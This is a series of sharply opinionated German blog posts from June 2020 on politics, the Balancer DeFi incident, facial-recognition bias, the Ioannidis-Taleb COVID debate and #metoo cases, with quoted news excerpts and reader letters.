Ja gut, aber was genau hat er denn am Telefon gemacht, was so blöde war? Na genau was ihr jetzt vermutet!
Trump incessantly boasted to his fellow heads of state, including Saudi Arabia's autocratic royal heir Mohammed bin Salman and North Korean dictator Kim Jong Un, about his own wealth, genius, "great" accomplishments as President, and the "idiocy" of his Oval Office predecessors, according to the sources.
OK aber wie hat sich denn die Merkel unter diesen Bedingungen geschlagen? Ganz gut:
Merkel remained calm and outwardly unruffled in the face of Trump's attacks —"like water off a duck's back," in the words of one source -- and she regularly countered his bluster with recitations of fact.
Merkel ist mit der CSU zusammen in einer Fraktion. Mit kompetenzfreien Blendern und Bullys hat die Erfahrung.
Der Artikel erwähnt namentlich Putin und Erdogan als Beispiele für Staatschefs, die Trump vorgeführt haben. Von Putin übertölpelt zu werden ist ja eine Sache, aber ... Erdogan!?!?

Mon Jun 29 2020

[l] Schlechte Laune? Dann hab ich was für euch!
Wie? Nein, kein Schlangenöl! Wobei ... nee doch, ist eigentlich doch Schlangenöl. Jemand hat bei Balancer die Kohle rausgetragen. Das ist alles "Crypto"-Jargon, der mit dem einen Ziel geschaffen wurde, eine Nebelwand zu errichten, um zu verschleiern, was hier wirklich passiert ist. Ich versuche mal eine Erklärung.
Es geht hier um Smart Contracts, d.h. Codestücke in der Blockchain, die "automatisch ausgeführt werden", vom System sozusagen. Die doppelte Steigerung von "keiner ist Schuld". Erstens: Software. Zweitens: "Das System" führt sie aus. Da kann nun wirklich niemand was für.
Was war geschehen? Jemand hat die Dokumentation gelesen.
Nein, wirklich. Das ist alles. Ich zitiere mal:
Decentralized finance (DeFi) liquidity provider Balancer Pool admitted early Monday morning that it had fallen victim to a sophisticated hack that exploited a loophole, tricking the protocol into releasing $500,000-worth of tokens.
Hier muss man mal mit der heißen Machete durch den Bullshit-Jargon durchschneiden, damit man versteht, was passiert ist. "DeFi" ist z.B. ein Nebelwand-Bullshit-Codewort für Crypto-Bullshitwährungen. Das De steht für Decentralized, das stimmt ja sogar, und das Fi ist halt Marketing-Wunschtraum. Wir sind ein Finance Player!!1!
Zurück zum Inhalt. Es gab keinen Hack. Es war auch kein Mensch, der hier Entscheidungen gefällt hat, sondern ein "protocol". Gemeint ist: Code. Sie haben Code geschrieben, der Geld verschenkt. Das ist die Bedeutung des Begriffes "liquidity provider". Liquidität ist in einem Markt, wenn Geld für Transaktionen verfügbar ist. Die Idee ist, dass es Angebot und Nachfrage gibt. Wenn es mehr Angebot als Nachfrage gibt, geht der Preis runter. Wenn es mehr Nachfrage als Angebot gibt, geht der Preis hoch. Solange der Markt liquide ist, gibt es aber immer jemanden, der die Waren abnimmt, oder der Waren verkauft. Nur halt möglicherweise zu einem sehr ungünstigen Preis.
Liquidität am Markt zu haben ist schon bei großen Aktenbörsen teilweise ein Problem, und es gibt dafür Mechanismen (die sogenannten Market Maker). Bei diesen ganzen unseriösen Bullshit-Crypto-Abzockgeschichten gibt es sowas aber natürlich nicht, es gibt ja auch keine Regulierung, das ist alles Wilder Westen. Damit man zumindest eine Bullshit-Geschichte zum Erzählen an Opf... äh zukünftige Kunden hat, wurde dieser Mechanismus geschaffen.
Der verschenkt natürlich nicht einfach an beliebige Passanten Geld, sondern nach Regeln.
Jemand hat jetzt die Dokumentation gelesen, was für Regeln das sind, und die dann künstlich herbeigeführt. Und zwar, wie sich das bei Zockern gehört, auf Pump. Damit der Hebel größer wird.
the attacker had borrowed $23 million-worth of WETH tokens, an ether-backed token suitable for DeFi trading, in a flash loan from dYdX. They then traded, against themselves, with Statera (STA), an investment token that uses a transfer fee model, and burns 1% of its value every time it’s traded.
Was fällt als erstes auf? Kein Hack. Es gab keinen Hack. Jemand hat valide Transaktionen am Markt durchgeführt. Mit eigenem Einsatz. Gut, geliehen, aber er haftet ja für geliehenes Geld.
The attacker went between WETH and STA 24 times, draining the STA liquidity pool until the balance was next to nothing. Because Balancer thought it had the same amount of STA, it released WETH that equated to the original balance, giving the attacker a larger margin for every trade they completed.
Der Code, der das Geld ausschüttet, hat gemäß seinen Regeln Geld ausgeschüttet.
“The person behind this attack was very sophisticated smart contract engineer with extensive knowledge and understanding of the leading DeFi protocols,” 1inch said in its blog post on the breach.
OH NEIN! CHEF WIR HABEN EIN PROBLEM! DER ANGREIFER KANN LESEN!!1!
Ja gut, damit konnte niemand rechnen. Wo kommen wir da hin, wenn Angreifer sich vorher die Dokumentation durchlesen?
the team behind Statera batted away accusations that the protocol had either failed or been designed intentionally for this sort of attack to take place.
Was für ein Angriff? Jemand hat das System regelkonform benutzt, und zwar genau dafür, wofür es gedacht war.
Ergebnis:
The project added that it was not in a position to be able to refund the attacker’s victims.
Ach Gottchen. Lange habe ich nicht mehr so viel Elend gesehen! Mein Mitleid kennt keine Grenzen!
Dies ist glaube ich die richtige Gelegenheit, nochmal den "Smart Contracts"-Teil meines Hypetech-Vortrags zu verlinken. Es ist mir aber an der Stelle wichtig, dass das kein Hackerangriff war. Der Angreifer hat den Code genau dafür angewendet, wofür er gedacht war. Nur haben die Deppen, die den Code geschrieben haben, sich halt vorher nicht ordentlich Gedanken gemacht. Das macht es nicht zu einem Hackerangriff. Eher zu einem Fall von "hättet ihr mal jemanden gefragt, der sich mit sowas auskennt".
Was ich ja immer wieder faszinierend finde: Dass jemand Startups in dem Umfeld noch Geld gibt.
Update: Wird noch besser!
If this sounds familiar, it's because we saw similar attacks happening earlier this year. Back in February, tokenized margin trading and lending platform bZx suffered two attacks, which were defined as not an oracle attack, but "a clever arbitrage execution."
Der Angriff war bekannt, aber sie haben ihn nicht verhindert, weil es nicht ihr Geld war, das sie da verteilt haben.

Sun Jun 28 2020

[l] Na? Schlechte Laune? Keine Sorge, ich habe was für euch!
Wie? Nein, kein Schlangenöl. Besser: Boris Johnson!
Aaaaalso. Die Amerikaner haben doch eines Tages GPS gebaut, damit ihre Raketen damit ihr Ziel treffen. Anfangs war da noch ein Rauschen auf dem zivilen Signal, damit DER RUSSE das nicht für ihre Raketen benutzt, aber als die EU dann irgendwann meinte, hey, wenn ihr euer Signal nicht entrauscht kriegt, dann bauen wir halt unser eigenes Satellitennavigationssystem, Galileo.
Nun ging es bei Galileo nie darum, ein Satellitennavigationssystem zu bauen. Die wollten, dass die Amis ihr künstliches Rauschen abstellen. Das hat Bill Clinton dann auch prompt gemacht. Aber die EU merkte: Hey, wenn wir das Projekt jetzt einstampfen, haben wir eine tolle Ausrede für Industrieförderung verplempert! Also lief Galileo weiter. Bis heute.
Nun, wie gesagt ist der wichtige Teil bei Galileo die Industrieförderung. Fast Forward 2020: Die Briten verlassen die EU. Damit fällt das goldene Füllhorn der EU weg.
Ihr könnt euch sicher schon vorstellen, wo die Story hingeht.
Boris Johnson so: Hey, pass uff, wie bauen einfach unser eigenes Satellitennavigationssystem. Es reicht nicht, dass es das der Amis, das der Russen, das der Chinesen und das der EU gibt. Wir brauchen unser eigenes. Das klingt absurd, bis man sich erinnert, dass es bei dem Projekt ja nicht um Satellitennavigation geht, sondern um Industrieförderung.
Aber man wollte wenigstens so tun als versuchte man auch den Bau eines Satellitennavigationssystems. Leider hat man dazu niemanden gefragt, der sich mit sowas auskannte. Denn als sich die Gelegenheit bot, für die OneWeb-Insolvenzmasse zu bieten, deren Satelliten auf einer für Navigationssatelliten ungeeigneten Höhe fliegen, hat Boris auf Ebay "kaufen" geklickt.
"Ja, wir haben die falschen Satelliten gekauft", zitiert der Guardian Dr. Bleddyn Bowen von der Universität Leicester.
Aber keine Sorge. Das macht nichts. Die Briten haben sich nie dem Euro angeschlossen, die können einfach Geld nachdrucken. Und wenn die Entwertung zu krass wird, dann pullen sie einfach ein Frankreich und streichen ein paar Nullen am Ende.
[l] Old and busted: Firma wegen "Hacker-Attacke" offline.
New hotness: Ministerpräsident wegen "Troll-Attacke" offline.
jetzt musste seine Facebook-Seite wegen zahlreicher Postings geschlossen werden.
Ja, meine Damen und Herren. Da kann man nichts machen. Wenn es geschlossen werden musste, dann musste es halt geschlossen werden. Das kennt man ja immer wieder. Die Heise-Foren werden ja auch immer wieder wegen zu viel Postings geschlossen.
Ein Glück, dass mein Blog nicht bei zu vielen Postings geschlossen werden muss.
Aber wie heißt es so schön? Safety first!
Insgesamt seien in 20 Stunden über 4.000 Kommentare eingegangen, die einen normalen Betrieb der Seite unmöglich gemacht hätten.
Ja komm, 4000 Kommentare, das sprengt ja wohl die Fähigkeiten jedes Webservers! Man stelle sich mal vor, bei einer Online-Petition gingen innerhalb von 20 Stunden 4000 Unterschriften ein! Da müsste die Site ja auch geschlossen werden!
Bonus: Wir reden hier von Facebook. Das war nicht mal ein Server, den die selbst verbrochen haben. Facebook!
Ich glaube ja, das eigentliche Problem ist, dass unsere Politik und unsere freidrehenden Gerichte das so geregelt haben, dass ich als Seiteninhaber möglicherweise für Inhalte Dritter, die auf meiner Seite gepostet werden, in Haftung genommen werden kann. Tja, Herr Kretschmann, das ist natürlich ein großes Problem. Wenn Sie doch nur jemanden in der Politik kennen würden, der da mal die Gesetzeslage reparieren könnte!

Thu Jun 25 2020

[l] Wirecard hat Insolvenz angemeldet.
Tja. 1,9 Milliarden hier, 1,9 Milliarden dort, nach einer Weile kommt da richtig Geld zusammen!
Stellt sich ja für mich die Frage, inwiefern das legal war, dass der CEO da noch schnell vorher seine Aktien zu Geld gemacht hat. Und sich dann mit dem Geld auf Kaution von der Haft freikaufen konnte.
Wo ist Roland Koch, wenn man ihn braucht?

Wed Jun 24 2020

[l] Zur Frage, wieso Gesichtserkennung bei Dunkelhäutigen schlechter funktioniert, kamen ein paar weiterhelfende Hinweise rein.
Erstens, und das war mir völlig neu, ist schon Film-Technik auf Weiße ausgerichtet, weil eben die Leute, die sich sowas leisten konnten, als das standardisiert wurde in der Anfangszeit, alle weiß waren. Das war denen schlicht wurscht, ob das auch Schwarze gut abbildet.
Faszinierenderweise scheint sich dieser Bias bis hin zur Digitalfotografie erhalten zu haben. Lacher am Rande: Für das südafrikanische Regime hat Polaroid dann Mittel und Wege gefunden, denn die brauchten für die Verwaltung ihrer Unterdrückten Fotos. Und:
Nicht Kodak, sondern afroamerikanische und asiatische Fotografen entwickelten die Technik laut Roth in den späten fünfziger Jahren weiter. Kodak habe sich erst bemüht, Brauntöne chemisch besser einzubinden, als die Kritik an der Bildqualität von zwei für das Unternehmen wichtigen Playern kam: von der Möbelindustrie und von der Schokoladenindustrie.
Oh. Mann. Ich hätte angenommen, dass die bloß alle zu doof zum Weißabgleich / ordentlich belichten sind und man diese Art von Problem mit dem Umstieg auf Digitalkameras nicht mehr hat.
Ein anderer Leser schrieb mir, dass Gesichtserkennung bei Männern besser funktioniert als bei Frauen, weil Männer mehr Falten haben. Ich weiß nicht, ob das heute noch üblich ist, aber als ich mich mit Gesichtserkennung und machine learning befasst habe, hat man noch die Daten vorbearbeitet, z.B. mit einer Kantenerkennung. Man wollte damit die "wichtigen" Merkmale betonen und unwichtiges Rauschen wegmachen, damit das neuronale Netz sich nicht an Rauschen aufhängt und Mist lernt. Inzwischen haben sich die Verfahren von neuronalen Netzen ein bisschen weiterentwickelt und das ist glaube ich nicht mehr so hilfreich wie früher, bin da aber nicht mehr so tief drin.
Der Leser bestätigte auch, dass man bei Schwarzen im Allgemeinen nicht genug Kontrast in den Aufnahmen hat, um Falten gut erkennen zu können. Das liegt aber nicht daran, dass es zu wenig Aufnahmen von Schwarzen gibt, im Gegenteil. In den USA sind die "Mugshots", also die bei Verhaftungen angefertigten Fotos, ziemlich frei verfügbar, und die dienen dann den Tech-Bros als Trainingsmaterial. Da sind Schwarze aber sogar deutlich überrepräsentiert, es gibt also keine Knappheit an Fotos. Und an schlechter Beleuchtung liegt es auch nicht.
Aber an der Stelle passen die beiden Einsendungen gut zusammen.
Update: Jetzt kommen hier lauter Leser rein, dass das mit dem "rassistischen Film" Bullshit ist, dass da eine Soziologin ohne Ahnung von Fotografie wilde Theorien aufstellt. Nun, ich habe leider auch keine Ahnung von Fotografie. Diese Schilderung hier erscheint mir allerdings plausibel:
Das Grundsätzliche Problem seit Erfindung der Bildwiedergabe ist es, den Dynamikumfang des menschlichen Auges möglichst original abzubilden. Das ist aber sehr viel schwerer als gedacht. Das Auge ist eben nicht nur die berühmte Camera Obscura sondern mit einem naja, sagen wir “sopisticated” Interpretationsapperat versehen. Wenn Menschen “sehen” machen sie das nämlich bei weiten nicht mit vollem vollem Gesichtskreis sondern sehen nur einzelne kleine scharfe Fokuspunkte die vom Gehirn in “Echtzeit” zu deinem vollen Gesichtsfeld zusammen gerendert werden. Dabei wird auch gefiltert: zb wird dein Nase aus deinem Blickfeld “entfernt” - Aber vor allem wird laufend die ‘Blende’ also die Iris angepasst und ermöglicht es so dem Auge ein unglaublich weiten Dynamikumfang abzubilden.
Das Zusammenspiel von Augen und Hirn um jeweils den Punkt der Aufmerksamkeit perfekt zu belichten, ermöglicht so ein Gesamteindruck mit einem Dynamikumfang von ca 14 Blendenstufen.
Erste kommerzielle Filme hatten einen Dynamikumfang von vllt 2-3 Blendenstufen. Das gute alte Fotopapier - was ja noch in den ’80 gebräuchlich war - hatte ca 5 Blendenstufen.
Erst heute, mit den immer besser und vor allen empfindlicher werdenden Sensoren, haben wir wirklich HDR fähige Aufzeichungsmethoden - Moderne Sensoren kommen auch schon mal auf bis zu 17 Blendenstufen Dynamikumfang.
Zurück zum "Schwarze kommen bei Bildern schlechter weg": Mein Rat ist es sich mal mit einem Hochzeitsfotograf zu unterhalten.
Die Schwierigkeit mit einem guten Farbfilm eine Motiv abzulichten, in dem die eine Hälfte ein Schwarzer Anzug und in der anderen ein Weißes Kleid ist, hat schon manchen Profi verzweifeln lassen.
Auf welche Lichtsituation verteilt man denn dann seine 5 Blendenstufen des Filmmatrials? auf das weiße Kleid? Dann ist der Anzug ein schwarzes Loch…
vis versa.
Mit heutigen Kameras ist das deutlich besser geworden - aber auch heute hast du noch Situationen in dem einfach wenig Licht zur Ausleuchtung vorhanden ist und die Kamera kann eben nicht wie das Auge/Hirn jeden Bildbereich einzeln anmessen und getrennt ausbelichten. Man kann halt nur einen Gewichtung vornehmen und hoffen, dass möglichst viel der echten Bildinfos es in den zur Verfügung stehenden Dynamikumfang schafft.
Allein deshalb gibt es ja das ganze Feld des Blendenstacking und HDR Bilder errechnen und Mircotonmapping etc.
IMHO(!) kann man das auch gut sehen - auch auf alten Bildern sind Schwarze gut ausgewogen Abgelichtet wenn sie alleiniges Motiv sind. Die Qualität nimmt rapide ab wenn es gemischt wird oder gar extreme Lichtsituationen sind (Weiße Marineuniformen im WWII zb). Ganz zu schweigen von den berüchtigten 'low cost schnapschüssen' die von absoluten Fotolaien mit billigsten Kameras gemacht wurden, auf denen der Schwarze Partyfreund in der dunklen Partyhöhle plötzlich verschwindet.
Ich nahm an, wenn man jetzt ordentliche HDR-Sensoren bauen kann, dass die dann schon überall drin sein werden. Vielleicht nicht die High-End-Modelle aber so halbwegs ordentlich zumindest. Aber jetzt wo ich da mal herumgoogele sieht das eher so aus, dass man HDR in Software macht. m(
[l] Hmm, Buzzfeed down, Bento down, Zett down.
Bleibt nur noch "Jetzt". Mit Schlagzeilen wie
Was bedeutet J.K. Rowlings Transfeindlichkeit für Harry-Potter-Fans?
Mit ihren Aussagen hat die Autorin viele enttäuscht. Darf man Harry Potter trotzdem noch gut finden?
Ob die ihre Denkverbote auch für Journalismus halten? Bestimmt!
Aber ist ja nicht alles nur Denkverbote bei denen. Gibt ja auch noch das ganze gefühlsduselige Empörungsprogramm. Wenn das kein Journalismus ist, dann weiß ich auch nicht.
Fakten waren gestern. Millennials wollen lieber Gefühle. Und zwar am besten negative Gefühle. Daher bomben wir sie mit Schuldgefühlen zu. Nun haben Millennials ja im Allgemeinen noch nicht viel gemacht im Leben, daher Kollektivschuld. Alles Rassisten da draußen. Und Transphobiker. Und Sexisten. Und überhaupt.
Mann, ich hatte irgendwie in Erinnerung, dass "jetzt" weniger schlimm war. Habe ich mich geirrt.

Tue Jun 23 2020

[l] Die New York Times hat Slate Star Codex vernichtet. Das war eines der inhaltlich qualitativ hochwertigsten Blogs der Welt, denn praktisch jeder Eintrag dort versprach mindestens einen Erkenntnisgewinn, häufig eher so ein Dutzend. Ich habe den hier auch schon mehrfach verlinkt.
Die New York Times hat jetzt einen Bericht über den gemacht und besteht darauf, seinen Realnamen zu veröffentlichen. Nicht weil es da einen Grund für gibt, sondern weil sie es können.
Ich hoffe mal, dass sich jetzt der gerechte Zorn der Intelligentsia Amerikas über der New York Times ergießt. Was für ein Arschloch-Move.

Mon Jun 22 2020

[l] Noch ein Leserbrief zu Statistiken und Coronavirus:
Das eigentliche Problem von Ioannidis' Bullshit ist anscheinend ein Elefant im Raum, den niemand erwähnt:
Diese verfickten und angeblich „kaputten“ Modelle mit den vielen Toten operieren unter der Annahme, dass man nichts tut! Die „Widerlegungen“ operieren unter den realen Bedingungen, in denen man sehr viel getan hat. Und wenn hier Ende Februar schon die Regale leer waren waren, dann sind die Leute halt nicht erst Ende März, als es dann endlich verordnet wurde, in Quarantäne gegangen!
Die einzige Frage ist dann, wie viel mehr erzwungen bringt als freiwillig, und dazu haben wir die Schweden (Freiwillig ist marginal zu wenig). Die wirtschaftlichen Folgen von zu wenig sind schlimmer als die von zu viel.
Wenn man also den Menschen als Virusträger nicht als Punkt in einer Wolke modelliert, sondern mit Hirn, ergibt sich bereits aus der Prognose ein Denkvorgang, der Hygienemaßnahmen zur Folge hat. Ja, so eine Überraschung auch, ich glaube, wir haben intelligentes Leben gefunden! Wider aller Erwartung! Staun! Trotz Hildmann und Co.!
Die IFR haben wir inzwischen dank der spanischen Untersuchung mit einem sehr breit ausgerollten Antikörpertest (60000 Leute) relativ sauber: ~5% Infektionsrate laut Antikörpertest (5,5% total, mit Rate+Rauschen) führte zu etwa 45000 Toten (offiziell+Übersterblichkeit, und da man von Murcia bis Madrid alles durchgetestet hat, hat man mit den 1,5% Infektionsrate in Murcia einen plausiblen Datenpunkt für das Hintergrundrauschen: Murcia hatte tatsächlich 1/10-1/20 von Madrids Infektionsgeschehen, und hätte dann ~1% Infektionsrate — die ~0,5% Hintergrundrauschen sind für einen sehr guten Test plausibel, und ändern am Gesamtergebnis nicht mehr viel).
Das ist 0,1% der spanischen Bevölkerung, die da innerhalb eines Monats mit heftigem Abbremsen in einem sehr starken Lockdown gestorben sind. D.h. wir haben ungefähr 2% IFR, oder ca. 1,3% der Bevölkerung, wenn die Herdenimmunität tatsächlich bei 66% erreicht wird. Das ist ein Test, bei dem die Messung selbst plausibel ist. Das sind jetzt nicht die 10% oder 30% von SARS und MERS, und auch nicht die über 50% von Ebola, aber es ist halt doch relativ viel.
Viele früheren Antikörper-Tests waren fehlerhaft kreuzreaktiv, und aus fehlerhaften Daten kann auch der beste Statistiker nur Müll extrahieren (wobei gute Statistiker aus fehlerhaften Daten die methodischen Fehler extrahieren, also den Müll offensichtlich machen). Dass dann auch noch Studien mit kleinen Zahlen wie die von Streeck (7 oder 8 Tote sind auf jeden Fall eine kleine Zahl, und eigenen sich nicht für eine Hochrechnung) benutzt werden…
Die 2% sind vergleichbar mit der Spanischen Grippe in Industrienationen wie das damalige Deutschland, das etwa 1% der Bevölkerung verloren hat (Infektionsrate ist da unbekannt, aber wir können raten: Das lief wenig gebremst durch). Die Spanische Grippe hat in Nicht-Industrienationen zwei interessante Eckpunkte, nämlich Indien mit 5% der Bevölkerung, und China mit „welche Spanische Grippe?“, trotz praktisch gleicher Armut, und praktisch nur TCM-Tees als Medizin, und zeigt, dass Armut nicht das ausschlaggebende Kriterium ist. Auch Covid-19 hat derzeit vor allem reiche westliche Industrienationen befallen.
BTW: Das schlimmste Preprint-Paper, das ich bisher gesehen habe, behauptet, die meisten Leute würden keine Antikörper produzieren. Sie haben eine bescheuerte Annahme über die Ansteckungsrate gemacht, Antikörper gemessen, keine gefunden, und statt ihre bescheuerten Annahme in die Tonne zu kloppen, daraus geschlossen, dass die meisten asymptomatischen Patienten keine Antikörper entwickeln.
SCMP
Wenn das Wissenschaft ist, dann können wir auch gleich eine Hexe verbrennen, und dann ist Corona beendet (ich vermute, dass die 25% Infektionsrate unter Krankenhausmitarbeitern die aus Texas ist, und in Wuhan halt dank Verfügbarkeit guter Schutzausrüstung halt weit weniger).
Tatsächlich haben wir dank lokaler Ausbrüche, z.B. Chorgesang mit >90% registrierten PCR-Infizierten (das ist so knapp mehr als false negatives zu erwarten sind), eine gute Vorstellung, wie viele ansteckbar sind, und die Fälle, die in der Regel wohl systematisch „verloren“ gehen, sind Kinder, die ihre Eltern oder Lehrer anstecken, selbst asymptomatisch sind, und zu spät getestet werden. Solche systematischen Fehler führen dann natürlich zu falschen Schlüssen, etwa, dass man Schulen bedenkenlos öffnen kann, obwohl Kinder Seuchenschleudern sind.
Das Phänomen, zuerst gehörte Informationen zu glauben und auf Teufel komm raus zu verteidigen, macht halt auch vor Leuten wie Ioannidis nicht Halt. Der ist wahrscheinlich auch mehr vom Typ Rebell, d.h. er hat erst mal eine Oppositionshaltung. Kann er die dann korrekt begründen, hat er das große Los gezogen. An den Grundsatzkritik, dass Mediziner selten Statistik über das Bilden eines Mittelwerts hinaus können, würde ich mich sogar beteiligen, das ist sicher völlig korrekt.
Und in der ganzen Betrachtung mit der Letalität fehlen die Langzeitfolgen für die Überlebenden völlig. Bei SARS sind 10% gestorben, und 40% sind so chronisch müde geworden, dass sie keiner Arbeit mehr nachgehen konnten. Gesellschaftlich sind diese 40% sogar teurer als die Toten. Und da man für ME/CFS 6 Monate lang Symptome braucht, bevor das diagnostiziert werden darf, wissen wir davon noch überhaupt nichts.
[l] Die Hauptquelle, auf die sich die Corona-ist-doch-nicht-so-schlimm-Fraktion beruft, ist John Ioannidis, ein Professor für Medizin, Epidemiologie und Bevölkerungsgesundheit, also jemand vom Fach, nicht irgendein Spinner sondern im Gegenteil so Establishment wie man nur sein kann. Er gehört zu den zehn meistzitierten Wissenschaftlern der Welt und war in der Chefredaktion von 18 peer-reviewten Journals. Seine Aussage, ich fasse hier wie immer überspitzend zusammen, ist vor allem Methodenkritik (und: Die Ausgangsdaten waren schlecht, daraus kann man gar nichts vorhersagen). Die Verfahren sind alle Scheiße, ist alles nicht so schlimm, sind viel weniger gestorben. Seine Zitierer machen daraus dann gerne ein "der Lockdown war völlig überflüssig" bis hin zu "das ist die NWO, die uns anketten will". Ioannidis selbst hat sich so geäußert, dass die wirtschaftlichen Schäden des Lockdowns zu mehr Schäden führen als das Virus es gekonnt hätte, z.B. weil die Selbstmordrate steigt, wenn die Arbeitslosigkeit steigt, und Kindesmissbrauch und häusliche Gewalt nähmen auch zu.
Das International Institute of Forecasters hat daraufhin ein Streitgespräch mit Nassim N. Taleb anberaumt. Ihre Zusammenfassung der Argumente von Ioannidis findet ihr hier und die der Argumente von Taleb sind hier. Taleb ist so eine Art Rockstar-Statistiker, weil er jahrelang Finanzstatistik an der Wall Street gemacht hat für deren Derivate-Schmuh und dann aus der Praxis in die Forschung kam. Auf ihn geht der Begriff Antifragilität zurück, weshalb ich ihn glaube ich auch mal im Blog verlinkt hatte. Unter Statistikern ist er nicht so beliebt, weil er die praktisch durch die Bank zu Scharlatanen erklärt hat, weil ihre Theorien gerne mal an den Aktienmärkten platzen und die sich dann hinter komplizierten Formelbergen zu verstecken suchen. Seine Argumente decken sich zumindest teilweise mit den Argumenten, die ich hier auch schon vorgebracht hatte, aber bei ihm natürlich viel eloquenter und mit mehr Autorität dahinter vorgebracht.
Das wird jetzt bestimmt zum Teil mein Confirmation Bias sein, aber ich finde seine Ausführungen deutlich überzeugender als die von Ioannidis. Viel Spaß beim Lesen!
Update: Leserbrief dazu:
Zu der Ioannidis Sache. Die Studien von Ioannidis sind auch alle komplett von A. Gelman auseinandergenommen worden. Mehrfach in dem Blog von Gelman. Gelman hattest du auch schon in deinem Blog, weil der sich sehr viel mit der Replikationskrise in der Psychologie befasst hat.
A. Gelman ist auch einer der Rockstar Statistiker, aber aus einem anderen Bereich als Taleb. Der macht vor allem Bayesianische Statistik und hat da eine ganze Reihe von Standardverfahren selbst mit entwickelt.
Money quote aus einem der Artikel zu Ioannidis:
Summary
I think the authors of the above-linked paper owe us all an apology. We wasted time and effort discussing this paper whose main selling point was some numbers that were essentially the product of a statistical error.
I’m serious about the apology. Everyone makes mistakes. I don’t think they authors need to apologize just because they screwed up. I think they need to apologize because these were avoidable screw-ups. They’re the kind of screw-ups that happen if you want to leap out with an exciting finding and you don’t look too carefully at what you might have done wrong.
Die anderen Postings dazu sind ähnlich "positiv".
Er vergleicht auch direkt Taleb und Ioannidis hier.

Fri Jun 19 2020

[l] In Deutschland kriegt man davon nicht so viel mit, aber #metoo ist noch aktiv. Aktuell sägen sie Warren Ellis ab. Das ist der Autor der legendären Transmetropolitan-Comics über einen Gonzo-Journalisten in einer Scifi-Dystopie.
Warum ich das erwähne? Lest euch das mal durch. Kann da jemand mal die Vorwürfe erklären? "Ich war jung und verwundbar, er hat mir eine Karriere bereitet und sich dann eine andere Freundin gesucht" lese ich da. Ich sehe nichts von Gewalt, nicht mal ungewollte Berührungen. Nichts. Er hat Frauen geholfen, und dann hat er anderen Frauen geholfen. Verbrennt ihn auf dem Scheiterhaufen! Warren Ellis hat auf Twitter ein Statement veröffentlicht, das leider ein bisschen vage bleiben muss, weil die Vorwürfe ja auch nur unkonkretes Geraune waren. Also erzählt er da was von wie privilegiert er gewesen sei und dass er jetzt zuhören statt reden will.
Wieso ist denn #metoo von konkreten Vorwürfen abgekommen, fragt ihr euch vielleicht? Nun, da gibt es auch gerade einen Fall, der das schön illustriert. Jesselyn Radack vs. Trevor Fitzgibbon. Sie ist bekannt geworden, weil sie Snowden anwaltlich unterstützt hat, und sich für Whistleblower eingesetzt hat. Saß auch mal auf dem CCC-Congress auf der Bühne glaube ich. Er ist ein in den USA bekannter Chef einer progressiven PR-Firma. Sie hat ihm konkrete Dinge vorgeworfen, geradezu eine Kampagne geführt, und davon bleibt jetzt nach gerichtlicher Prüfung folgendes übrig:
We’ve settled the case. As part of the settlement, I retract all stmts I’ve made about Trevor Fitzgibbon & apologize for any harm I’ve caused Mr. Fitzgibbon & his family. I have no further comment.
Justice has been served! Wer gibt dem Fitzgibbon jetzt sein Leben zurück?
Mit Missbrauchsvorwürfen ist das eben wie mit Geheimdiensten, Prügelcops und dem Filesharing-Richter am Amtsgericht Köln. Macht korrumpiert. Je mehr Macht, desto höher das Korruptionsrisiko.
Update: Hier versucht sich einer an einer etwas ausgewogeneren Berichterstattung über Warren Ellis. Auch da fällt es mir aber schwer, konkrete Vorwürfe zu finden. Er hat Sex-Chat mit Frauen gemacht, die schon einen Freund hatten.
Mich betrifft das ja alles glücklicherweise nicht, aber ich bin ja doch genug Feminist, um mich über dieses prähistorische Frauenbild zu ärgern. Frauen sind alle dumm, handlungsunfähig und Opfer. Es ist daher Aufgabe des sie anflirtenden Mannes dafür zu sorgen, dass sie nicht einem anderen Partner untreu wird. Hätte der halt vorher recherchieren müssen!!1! Dass das vielleicht Sache der (erwachsenen!) Frau ist, mit wievielen und welchen Männern (oder Frauen!) sie zu welcher Zeit was macht, das wird hier völlig negiert. Und das auch noch von den Frauen selbst! Finde ich abstoßend.
Auch dieser "ich war jung und verwundbar"-Rehaugen-Scheiß immer. Willkommen im Leben. Das ist eine Phase, durch die alle Menschen durchmüssen, die nicht vorher sterben. Übernehmt mal bitte ein bisschen Verantwortung für euer Handeln!
"Ich bin in das Webforum gegangen, und habe gesehen, dass die da sexistische Witze machen, und dann bin ich sofort ... dageblieben und habe das 20 Jahre über mich ergehen lassen, und jetzt will ich Gerechtigkeit!!1!" *augenroll*

Wed Jun 17 2020

[l] Wenn ihr hier schon eine Weile mitlest, dann werdet ihr ja mitgekriegt haben, dass ich seit vielen Jahren den Trend beobachte und davor warne, dass "die Software" schuld ist. Wir bauen hyperkomplexe, fragile, dysfunktionale Systeme, und dann ist am Ende keiner Schuld gewesen.
Es gibt gerade ein tolles Beispiel dafür.
Und zwar war ja vor einer Weile ein unschuldiger syrischer Flüchtling namens Amad A. in Kleve (NRW) in einer Gefängniszelle qualvoll verbrannt. Jahrelang wollte es niemand gewesen zu sein. Es gab einen Untersuchungsausschuss, der nichts bewirkt hat. Und jetzt? Jetzt war es ein Softwarefehler. Na dann ist ja alles gut. Phew. Ich befürchtete schon, da habe jemand einen Fehler gemacht! Jemand, den man dafür zur Rechenschaft ziehen könnte vielleicht! Aber Softwarefehler? Tja. Da kann man nichts machen.
*im Strahl kotz*

Sun Jun 14 2020

[l] Oh ach so! Jetzt verstehe ich die "unbürokratische Soforthilfe" für Selbständige! Ich hatte mich schon gewundert! Seit wann hilft die Bundesregierung Selbständigen? Wenn da mal Kohle locker gemacht wird, dann doch nur für die Banken oder die Lufthansa.
Stellt sich nämlich raus: Das durfte man nur für Betriebskosten nutzen. Selbständige, die Soforthilfe als Soforthilfe genutzt haben, stehen jetzt unter Betrugsverdacht.
Ach komm, Fefe, von so einer freischaffenden Künstlerin kann man ja wohl erwarten, dass sie ein paar tausend Euro für Pandemien zurückgelegt hat!!1!
Und hey, solange die Abgeordneten nicht in Not geraten, sehe ich das Problem gar nicht. Solange kann ja wohl von Not keine Rede sein! *Rotwein entkork*

Fri Jun 12 2020

[l] Aber Fefe, der Rezo ist doch auch nicht unfehlbar! Und seine peinlich gezwungen wirkende pseudohippe Jugendsprache!1!! Und die FAZ hat ja möglicherweise Recht, dass er bei ihnen ein paar Ausrutscher zu viel gezählt hat! Außerdem ist Rezo doch ein Shill der Werbemafia, denn man kann ihn bei Ströer buchen!
Meine Güte. Ich ahnte ja, dass die FAZ und ihre Leserschaft niveautechnisch deutlich nachgelassen haben seit den 80er Jahren, aber da entgleisen mir ja doch gerade ziemlich die Gesichtszüge.
